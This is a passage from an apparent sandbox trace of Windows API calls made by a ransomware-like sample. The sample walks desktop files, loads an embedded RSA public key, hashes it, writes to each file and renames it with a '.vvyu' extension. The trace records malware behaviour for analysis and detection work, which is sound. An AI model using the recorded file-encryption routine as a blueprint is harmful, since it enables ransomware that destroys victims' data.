returned 41 [0188.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.278] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.278] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.278] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.278] CloseHandle (hObject=0x584) returned 1 [0188.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0188.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.281] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\Exko6hh.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\exko6hh.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\Exko6hh.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\exko6hh.png.vvyu")) returned 1 [0188.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.282] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.285] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98f2a890, ftCreationTime.dwHighDateTime=0x1d89a3a, ftLastAccessTime.dwLowDateTime=0xd3d16990, ftLastAccessTime.dwHighDateTime=0x1d89fa0, ftLastWriteTime.dwLowDateTime=0xd3d16990, ftLastWriteTime.dwHighDateTime=0x1d89fa0, nFileSizeHigh=0x0, nFileSizeLow=0x3c3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyK8l.flv", cAlternateFileName="")) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0188.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.285] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\kyK8l.flv") returned=".flv" [0188.285] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\kyK8l.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\kyk8l.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.287] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=15421) returned 1 [0188.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.289] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3c17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.289] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.291] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.291] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x3c3d, lpOverlapped=0x0) returned 1 [0188.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.292] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.293] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.293] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.293] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.293] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.293] GetLastError () returned 0x0 [0188.293] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.293] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.293] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.293] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.293] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3c40) returned 0x2d43778 [0188.294] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38eb0 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.295] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39880 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0188.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.297] GetCurrentThreadId () returned 0x264 [0188.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d383c8 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.298] GetCurrentThreadId () returned 0x264 [0188.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0188.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0188.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0188.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38eb0 | out: hHeap=0x6a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.309] HeapFree (in: 